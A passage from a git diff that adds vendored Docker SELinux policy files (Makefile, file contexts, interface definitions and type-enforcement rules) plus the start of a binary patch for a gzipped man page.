+library.  If this is what you want to do, use the GNU Library General
+Public License instead of this License.
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile
new file mode 100644
index 0000000000..1bdc695afe
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile
@@ -0,0 +1,16 @@
+TARGETS?=docker
+MODULES?=${TARGETS:=.pp.bz2}
+SHAREDIR?=/usr/share
+
+all: ${TARGETS:=.pp.bz2}
+
+%.pp.bz2: %.pp
+	@echo Compressing $^ -\> $@
+	bzip2 -9 $^
+
+%.pp: %.te
+	make -f ${SHAREDIR}/selinux/devel/Makefile $@
+
+clean:
+	rm -f *~  *.tc *.pp *.pp.bz2
+	rm -rf tmp *.tar.gz
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc
new file mode 100644
index 0000000000..467d659604
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc
@@ -0,0 +1,18 @@
+/root/\.docker	gen_context(system_u:object_r:docker_home_t,s0)
+
+/usr/bin/dockerd			--	gen_context(system_u:object_r:docker_exec_t,s0)
+
+/usr/lib/systemd/system/docker.service		--	gen_context(system_u:object_r:docker_unit_file_t,s0)
+
+/etc/docker(/.*)?		gen_context(system_u:object_r:docker_config_t,s0)
+
+/var/lib/docker(/.*)?		gen_context(system_u:object_r:docker_var_lib_t,s0)
+
+/var/run/docker\.pid		--	gen_context(system_u:object_r:docker_var_run_t,s0)
+/var/run/docker\.sock		-s	gen_context(system_u:object_r:docker_var_run_t,s0)
+/var/run/docker-client(/.*)?		gen_context(system_u:object_r:docker_var_run_t,s0)
+
+/var/lib/docker/init(/.*)?		gen_context(system_u:object_r:docker_share_t,s0)
+/var/lib/docker/containers/.*/hosts		gen_context(system_u:object_r:docker_share_t,s0)
+/var/lib/docker/containers/.*/hostname		gen_context(system_u:object_r:docker_share_t,s0)
+/var/lib/docker/.*/config\.env	gen_context(system_u:object_r:docker_share_t,s0)
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if
new file mode 100644
index 0000000000..ca075c05c5
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if
@@ -0,0 +1,461 @@
+
+## <summary>The open-source application container engine.</summary>
+
+########################################
+## <summary>
+##	Execute docker in the docker domain.
+## </summary>
+## <param name="domain">
+## <summary>
+##	Domain allowed to transition.
+## </summary>
+## </param>
+#
+interface(`docker_domtrans',`
+	gen_require(`
+		type docker_t, docker_exec_t;
+	')
+
+	corecmd_search_bin($1)
+	domtrans_pattern($1, docker_exec_t, docker_t)
+')
+
+########################################
+## <summary>
+##	Execute docker in the caller domain.
+## </summary>
+## <param name="domain">
+## <summary>
+##	Domain allowed to transition.
+## </summary>
+## </param>
+#
+interface(`docker_exec',`
+	gen_require(`
+		type docker_exec_t;
+	')
+
+	corecmd_search_bin($1)
+	can_exec($1, docker_exec_t)
+')
+
+########################################
+## <summary>
+##	Search docker lib directories.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_search_lib',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	allow $1 docker_var_lib_t:dir search_dir_perms;
+	files_search_var_lib($1)
+')
+
+########################################
+## <summary>
+##	Execute docker lib directories.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_exec_lib',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	allow $1 docker_var_lib_t:dir search_dir_perms;
+	can_exec($1, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Read docker lib files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_read_lib_files',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	files_search_var_lib($1)
+	read_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Read docker share files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_read_share_files',`
+	gen_require(`
+		type docker_share_t;
+	')
+
+	files_search_var_lib($1)
+	read_files_pattern($1, docker_share_t, docker_share_t)
+')
+
+########################################
+## <summary>
+##	Manage docker lib files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_manage_lib_files',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	files_search_var_lib($1)
+	manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
+	manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Manage docker lib directories.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_manage_lib_dirs',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	files_search_var_lib($1)
+	manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Create objects in a docker var lib directory
+##	with an automatic type transition to
+##	a specified private type.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+## <param name="private_type">
+##	<summary>
+##	The type of the object to create.
+##	</summary>
+## </param>
+## <param name="object_class">
+##	<summary>
+##	The class of the object to be created.
+##	</summary>
+## </param>
+## <param name="name" optional="true">
+##	<summary>
+##	The name of the object being created.
+##	</summary>
+## </param>
+#
+interface(`docker_lib_filetrans',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	filetrans_pattern($1, docker_var_lib_t, $2, $3, $4)
+')
+
+########################################
+## <summary>
+##	Read docker PID files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_read_pid_files',`
+	gen_require(`
+		type docker_var_run_t;
+	')
+
+	files_search_pids($1)
+	read_files_pattern($1, docker_var_run_t, docker_var_run_t)
+')
+
+########################################
+## <summary>
+##	Execute docker server in the docker domain.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed to transition.
+##	</summary>
+## </param>
+#
+interface(`docker_systemctl',`
+	gen_require(`
+		type docker_t;
+		type docker_unit_file_t;
+	')
+
+	systemd_exec_systemctl($1)
+	init_reload_services($1)
+        systemd_read_fifo_file_passwd_run($1)
+	allow $1 docker_unit_file_t:file read_file_perms;
+	allow $1 docker_unit_file_t:service manage_service_perms;
+
+	ps_process_pattern($1, docker_t)
+')
+
+########################################
+## <summary>
+##	Read and write docker shared memory.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_rw_sem',`
+	gen_require(`
+		type docker_t;
+	')
+
+	allow $1 docker_t:sem rw_sem_perms;
+')
+
+#######################################
+## <summary>
+##  Read and write the docker pty type.
+## </summary>
+## <param name="domain">
+##  <summary>
+##  Domain allowed access.
+##  </summary>
+## </param>
+#
+interface(`docker_use_ptys',`
+    gen_require(`
+        type docker_devpts_t;
+    ')
+
+    allow $1 docker_devpts_t:chr_file rw_term_perms;
+')
+
+#######################################
+## <summary>
+##      Allow domain to create docker content
+## </summary>
+## <param name="domain">
+##      <summary>
+##      Domain allowed access.
+##      </summary>
+## </param>
+#
+interface(`docker_filetrans_named_content',`
+
+    gen_require(`
+        type docker_var_lib_t;
+        type docker_share_t;
+	type docker_log_t;
+	    type docker_var_run_t;
+        type docker_home_t;
+    ')
+
+    files_pid_filetrans($1, docker_var_run_t, file, "docker.pid")
+    files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock")
+    files_pid_filetrans($1, docker_var_run_t, dir, "docker-client")
+    files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init")
+    userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker")
+')
+
+########################################
+## <summary>
+##	Connect to docker over a unix stream socket.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_stream_connect',`
+	gen_require(`
+		type docker_t, docker_var_run_t;
+	')
+
+	files_search_pids($1)
+	stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t)
+')
+
+########################################
+## <summary>
+##	Connect to SPC containers over a unix stream socket.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_spc_stream_connect',`
+	gen_require(`
+		type spc_t, spc_var_run_t;
+	')
+
+	files_search_pids($1)
+	files_write_all_pid_sockets($1)
+	allow $1 spc_t:unix_stream_socket connectto;
+')
+
+
+########################################
+## <summary>
+##	All of the rules required to administrate
+##	an docker environment
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_admin',`
+	gen_require(`
+		type docker_t;
+		type docker_var_lib_t, docker_var_run_t;
+		type docker_unit_file_t;
+		type docker_lock_t;
+		type docker_log_t;
+		type docker_config_t;
+	')
+
+	allow $1 docker_t:process { ptrace signal_perms };
+	ps_process_pattern($1, docker_t)
+
+	admin_pattern($1, docker_config_t)
+
+	files_search_var_lib($1)
+	admin_pattern($1, docker_var_lib_t)
+
+	files_search_pids($1)
+	admin_pattern($1, docker_var_run_t)
+
+	files_search_locks($1)
+	admin_pattern($1, docker_lock_t)
+
+	logging_search_logs($1)
+	admin_pattern($1, docker_log_t)
+
+	docker_systemctl($1)
+	admin_pattern($1, docker_unit_file_t)
+	allow $1 docker_unit_file_t:service all_service_perms;
+
+	optional_policy(`
+		systemd_passwd_agent_exec($1)
+		systemd_read_fifo_file_passwd_run($1)
+	')
+')
+
+interface(`domain_stub_named_filetrans_domain',`
+    gen_require(`
+        attribute named_filetrans_domain;
+    ')
+')
+
+interface(`lvm_stub',`
+    gen_require(`
+        type lvm_t;
+    ')
+')
+interface(`staff_stub',`
+    gen_require(`
+        type staff_t;
+    ')
+')
+interface(`virt_stub_svirt_sandbox_domain',`
+	gen_require(`
+		attribute svirt_sandbox_domain;
+	')
+')
+interface(`virt_stub_svirt_sandbox_file',`
+	gen_require(`
+		type svirt_sandbox_file_t;
+	')
+')
+interface(`fs_dontaudit_remount_tmpfs',`
+	gen_require(`
+		type tmpfs_t;
+	')
+
+	dontaudit $1 tmpfs_t:filesystem remount;
+')
+interface(`dev_dontaudit_list_all_dev_nodes',`
+	gen_require(`
+		type device_t;
+	')
+
+	dontaudit $1 device_t:dir list_dir_perms;
+')
+interface(`kernel_unlabeled_entry_type',`
+	gen_require(`
+		type unlabeled_t;
+	')
+
+	domain_entry_file($1, unlabeled_t)
+')
+interface(`kernel_unlabeled_domtrans',`
+	gen_require(`
+		type unlabeled_t;
+	')
+
+	read_lnk_files_pattern($1, unlabeled_t, unlabeled_t)
+	domain_transition_pattern($1, unlabeled_t, $2)
+	type_transition $1 unlabeled_t:process $2;
+')
+interface(`files_write_all_pid_sockets',`
+	gen_require(`
+		attribute pidfile;
+	')
+
+	allow $1 pidfile:sock_file write_sock_file_perms;
+')
+interface(`dev_dontaudit_mounton_sysfs',`
+	gen_require(`
+		type sysfs_t;
+	')
+
+	dontaudit $1 sysfs_t:dir mounton;
+')
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te
new file mode 100644
index 0000000000..bad0bb6e4c
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te
@@ -0,0 +1,407 @@
+policy_module(docker, 1.0.0)
+
+########################################
+#
+# Declarations
+#
+
+## <desc>
+##  <p>
+##  Determine whether docker can
+##  connect to all TCP ports.
+##  </p>
+## </desc>
+gen_tunable(docker_connect_any, false)
+
+type docker_t;
+type docker_exec_t;
+init_daemon_domain(docker_t, docker_exec_t)
+domain_subj_id_change_exemption(docker_t)
+domain_role_change_exemption(docker_t)
+
+type spc_t;
+domain_type(spc_t)
+role system_r types spc_t;
+
+type spc_var_run_t;
+files_pid_file(spc_var_run_t)
+
+type docker_var_lib_t;
+files_type(docker_var_lib_t)
+
+type docker_home_t;
+userdom_user_home_content(docker_home_t)
+
+type docker_config_t;
+files_config_file(docker_config_t)
+
+type docker_lock_t;
+files_lock_file(docker_lock_t)
+
+type docker_log_t;
+logging_log_file(docker_log_t)
+
+type docker_tmp_t;
+files_tmp_file(docker_tmp_t)
+
+type docker_tmpfs_t;
+files_tmpfs_file(docker_tmpfs_t)
+
+type docker_var_run_t;
+files_pid_file(docker_var_run_t)
+
+type docker_unit_file_t;
+systemd_unit_file(docker_unit_file_t)
+
+type docker_devpts_t;
+term_pty(docker_devpts_t)
+
+type docker_share_t;
+files_type(docker_share_t)
+
+########################################
+#
+# docker local policy
+#
+allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap };
+allow docker_t self:tun_socket relabelto;
+allow docker_t self:process { getattr signal_perms setrlimit setfscreate };
+allow docker_t self:fifo_file rw_fifo_file_perms;
+allow docker_t self:unix_stream_socket create_stream_socket_perms;
+allow docker_t self:tcp_socket create_stream_socket_perms;
+allow docker_t self:udp_socket create_socket_perms;
+allow docker_t self:capability2 block_suspend;
+
+manage_files_pattern(docker_t, docker_home_t, docker_home_t)
+manage_dirs_pattern(docker_t, docker_home_t, docker_home_t)
+manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t)
+userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker")
+
+manage_dirs_pattern(docker_t, docker_config_t, docker_config_t)
+manage_files_pattern(docker_t, docker_config_t, docker_config_t)
+files_etc_filetrans(docker_t, docker_config_t, dir, "docker")
+
+manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t)
+manage_files_pattern(docker_t, docker_lock_t, docker_lock_t)
+
+manage_dirs_pattern(docker_t, docker_log_t, docker_log_t)
+manage_files_pattern(docker_t, docker_log_t, docker_log_t)
+manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t)
+logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file })
+allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto };
+
+manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t)
+manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
+manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
+files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file })
+
+manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+allow docker_t docker_tmpfs_t:dir relabelfrom;
+can_exec(docker_t, docker_tmpfs_t)
+fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file })
+allow docker_t docker_tmpfs_t:chr_file mounton;
+
+manage_dirs_pattern(docker_t, docker_share_t, docker_share_t)
+manage_files_pattern(docker_t, docker_share_t, docker_share_t)
+manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t)
+allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto };
+
+can_exec(docker_t, docker_share_t)
+#docker_filetrans_named_content(docker_t)
+
+manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto };
+files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file })
+
+manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file })
+
+allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms };
+term_create_pty(docker_t, docker_devpts_t)
+
+kernel_read_system_state(docker_t)
+kernel_read_network_state(docker_t)
+kernel_read_all_sysctls(docker_t)
+kernel_rw_net_sysctls(docker_t)
+kernel_setsched(docker_t)
+kernel_read_all_proc(docker_t)
+
+domain_use_interactive_fds(docker_t)
+domain_dontaudit_read_all_domains_state(docker_t)
+
+corecmd_exec_bin(docker_t)
+corecmd_exec_shell(docker_t)
+
+corenet_tcp_bind_generic_node(docker_t)
+corenet_tcp_sendrecv_generic_if(docker_t)
+corenet_tcp_sendrecv_generic_node(docker_t)
+corenet_tcp_sendrecv_generic_port(docker_t)
+corenet_tcp_bind_all_ports(docker_t)
+corenet_tcp_connect_http_port(docker_t)
+corenet_tcp_connect_commplex_main_port(docker_t)
+corenet_udp_sendrecv_generic_if(docker_t)
+corenet_udp_sendrecv_generic_node(docker_t)
+corenet_udp_sendrecv_all_ports(docker_t)
+corenet_udp_bind_generic_node(docker_t)
+corenet_udp_bind_all_ports(docker_t)
+
+files_read_config_files(docker_t)
+files_dontaudit_getattr_all_dirs(docker_t)
+files_dontaudit_getattr_all_files(docker_t)
+
+fs_read_cgroup_files(docker_t)
+fs_read_tmpfs_symlinks(docker_t)
+fs_search_all(docker_t)
+fs_getattr_all_fs(docker_t)
+
+storage_raw_rw_fixed_disk(docker_t)
+
+auth_use_nsswitch(docker_t)
+auth_dontaudit_getattr_shadow(docker_t)
+
+init_read_state(docker_t)
+init_status(docker_t)
+
+logging_send_audit_msgs(docker_t)
+logging_send_syslog_msg(docker_t)
+
+miscfiles_read_localization(docker_t)
+
+mount_domtrans(docker_t)
+
+seutil_read_default_contexts(docker_t)
+seutil_read_config(docker_t)
+
+sysnet_dns_name_resolve(docker_t)
+sysnet_exec_ifconfig(docker_t)
+
+optional_policy(`
+	rpm_exec(docker_t)
+	rpm_read_db(docker_t)
+	rpm_exec(docker_t)
+')
+
+optional_policy(`
+	fstools_domtrans(docker_t)
+')
+
+optional_policy(`
+	iptables_domtrans(docker_t)
+')
+
+optional_policy(`
+	openvswitch_stream_connect(docker_t)
+')
+
+allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace };
+
+allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms };
+
+allow docker_t self:netlink_route_socket rw_netlink_socket_perms;;
+allow docker_t self:netlink_audit_socket create_netlink_socket_perms;
+allow docker_t self:unix_dgram_socket { create_socket_perms sendto };
+allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto };
+
+allow docker_t docker_var_lib_t:dir mounton;
+allow docker_t docker_var_lib_t:chr_file mounton;
+can_exec(docker_t, docker_var_lib_t)
+
+kernel_dontaudit_setsched(docker_t)
+kernel_get_sysvipc_info(docker_t)
+kernel_request_load_module(docker_t)
+kernel_mounton_messages(docker_t)
+kernel_mounton_all_proc(docker_t)
+kernel_mounton_all_sysctls(docker_t)
+kernel_unlabeled_entry_type(spc_t)
+kernel_unlabeled_domtrans(docker_t, spc_t)
+
+dev_getattr_all(docker_t)
+dev_getattr_sysfs_fs(docker_t)
+dev_read_urand(docker_t)
+dev_read_lvm_control(docker_t)
+dev_rw_sysfs(docker_t)
+dev_rw_loop_control(docker_t)
+dev_rw_lvm_control(docker_t)
+
+files_getattr_isid_type_dirs(docker_t)
+files_manage_isid_type_dirs(docker_t)
+files_manage_isid_type_files(docker_t)
+files_manage_isid_type_symlinks(docker_t)
+files_manage_isid_type_chr_files(docker_t)
+files_manage_isid_type_blk_files(docker_t)
+files_exec_isid_files(docker_t)
+files_mounton_isid(docker_t)
+files_mounton_non_security(docker_t)
+files_mounton_isid_type_chr_file(docker_t)
+
+fs_mount_all_fs(docker_t)
+fs_unmount_all_fs(docker_t)
+fs_remount_all_fs(docker_t)
+files_mounton_isid(docker_t)
+fs_manage_cgroup_dirs(docker_t)
+fs_manage_cgroup_files(docker_t)
+fs_relabelfrom_xattr_fs(docker_t)
+fs_relabelfrom_tmpfs(docker_t)
+fs_read_tmpfs_symlinks(docker_t)
+fs_list_hugetlbfs(docker_t)
+
+term_use_generic_ptys(docker_t)
+term_use_ptmx(docker_t)
+term_getattr_pty_fs(docker_t)
+term_relabel_pty_fs(docker_t)
+term_mounton_unallocated_ttys(docker_t)
+
+modutils_domtrans_insmod(docker_t)
+
+systemd_status_all_unit_files(docker_t)
+systemd_start_systemd_services(docker_t)
+
+userdom_stream_connect(docker_t)
+userdom_search_user_home_content(docker_t)
+userdom_read_all_users_state(docker_t)
+userdom_relabel_user_home_files(docker_t)
+userdom_relabel_user_tmp_files(docker_t)
+userdom_relabel_user_tmp_dirs(docker_t)
+
+optional_policy(`
+	gpm_getattr_gpmctl(docker_t)
+')
+
+optional_policy(`
+	dbus_system_bus_client(docker_t)
+	init_dbus_chat(docker_t)
+	init_start_transient_unit(docker_t)
+
+	optional_policy(`
+		systemd_dbus_chat_logind(docker_t)
+	')
+
+	optional_policy(`
+		firewalld_dbus_chat(docker_t)
+	')
+')
+
+optional_policy(`
+	udev_read_db(docker_t)
+')
+
+optional_policy(`
+	virt_read_config(docker_t)
+	virt_exec(docker_t)
+	virt_stream_connect(docker_t)
+	virt_stream_connect_sandbox(docker_t)
+	virt_exec_sandbox_files(docker_t)
+	virt_manage_sandbox_files(docker_t)
+	virt_relabel_sandbox_filesystem(docker_t)
+	virt_transition_svirt_sandbox(docker_t, system_r)
+	virt_mounton_sandbox_file(docker_t)
+#	virt_attach_sandbox_tun_iface(docker_t)
+	allow docker_t svirt_sandbox_domain:tun_socket relabelfrom;
+')
+
+tunable_policy(`docker_connect_any',`
+    corenet_tcp_connect_all_ports(docker_t)
+    corenet_sendrecv_all_packets(docker_t)
+    corenet_tcp_sendrecv_all_ports(docker_t)
+')
+
+########################################
+#
+# spc local policy
+#
+domain_entry_file(spc_t, docker_share_t)
+domain_entry_file(spc_t, docker_var_lib_t)
+role system_r types spc_t;
+
+domain_entry_file(spc_t, docker_share_t)
+domain_entry_file(spc_t, docker_var_lib_t)
+domtrans_pattern(docker_t, docker_share_t, spc_t)
+domtrans_pattern(docker_t, docker_var_lib_t, spc_t)
+allow docker_t spc_t:process { setsched signal_perms };
+ps_process_pattern(docker_t, spc_t)
+allow docker_t spc_t:socket_class_set { relabelto relabelfrom };
+
+optional_policy(`
+	dbus_chat_system_bus(spc_t)
+')
+
+optional_policy(`
+	unconfined_domain_noaudit(spc_t)
+')
+
+optional_policy(`
+	unconfined_domain(docker_t)
+')
+
+optional_policy(`
+	virt_transition_svirt_sandbox(spc_t, system_r)
+')
+
+########################################
+#
+# docker upstream policy
+#
+
+optional_policy(`
+#    domain_stub_named_filetrans_domain()
+     gen_require(`
+        attribute named_filetrans_domain;
+     ')
+
+      docker_filetrans_named_content(named_filetrans_domain)
+')
+
+optional_policy(`
+    lvm_stub()
+    docker_rw_sem(lvm_t)
+')
+
+optional_policy(`
+    staff_stub()
+    docker_stream_connect(staff_t)
+    docker_exec(staff_t)
+')
+
+optional_policy(`
+    virt_stub_svirt_sandbox_domain()
+    virt_stub_svirt_sandbox_file()
+    allow svirt_sandbox_domain self:netlink_kobject_uevent_socket create_socket_perms;
+    docker_read_share_files(svirt_sandbox_domain)
+    docker_lib_filetrans(svirt_sandbox_domain,svirt_sandbox_file_t, sock_file)
+    docker_use_ptys(svirt_sandbox_domain)
+    docker_spc_stream_connect(svirt_sandbox_domain)
+    fs_list_tmpfs(svirt_sandbox_domain)
+    fs_rw_hugetlbfs_files(svirt_sandbox_domain)
+    fs_dontaudit_remount_tmpfs(svirt_sandbox_domain)
+    dev_dontaudit_mounton_sysfs(svirt_sandbox_domain)
+
+    tunable_policy(`virt_sandbox_use_fusefs',`
+	fs_manage_fusefs_dirs(svirt_sandbox_domain)
+	fs_manage_fusefs_files(svirt_sandbox_domain)
+	fs_manage_fusefs_symlinks(svirt_sandbox_domain)
+    ')
+     gen_require(`
+        attribute domain;
+     ')
+
+     dontaudit svirt_sandbox_domain domain:key {search link};
+')
+
+optional_policy(`
+	gen_require(`
+		type pcp_pmcd_t;
+	')
+	docker_manage_lib_files(pcp_pmcd_t)
+')
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz
new file mode 100644
index 0000000000000000000000000000000000000000..ab5d59445ac1601ca378aaa3e71fb9cff43a1592
GIT binary patch
literal 2847
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
